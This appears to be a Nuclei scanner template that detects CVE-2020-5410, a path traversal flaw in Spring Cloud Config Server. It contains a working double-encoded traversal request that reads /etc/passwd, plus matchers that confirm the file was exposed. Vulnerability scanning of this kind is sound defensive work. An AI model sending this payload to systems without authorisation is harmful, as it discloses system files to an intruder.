40 lines
1.3 KiB
YAML
40 lines
1.3 KiB
YAML
id: CVE-2020-5410
|
|
|
|
info:
|
|
name: Spring Cloud Config Server - Local File Inclusion
|
|
author: mavericknerd
|
|
severity: high
|
|
description: Spring Cloud Config Server versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user or attacker can send a request using a specially crafted URL that can lead to a local file inclusion attack.
|
|
reference:
|
|
- https://tanzu.vmware.com/security/cve-2020-5410
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-5410
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2020-5410
|
|
cwe-id: CWE-22
|
|
cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:*
|
|
epss-score: 0.9712
|
|
tags: cve,cve2020,lfi,springcloud,config,traversal,kev
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/06/28
|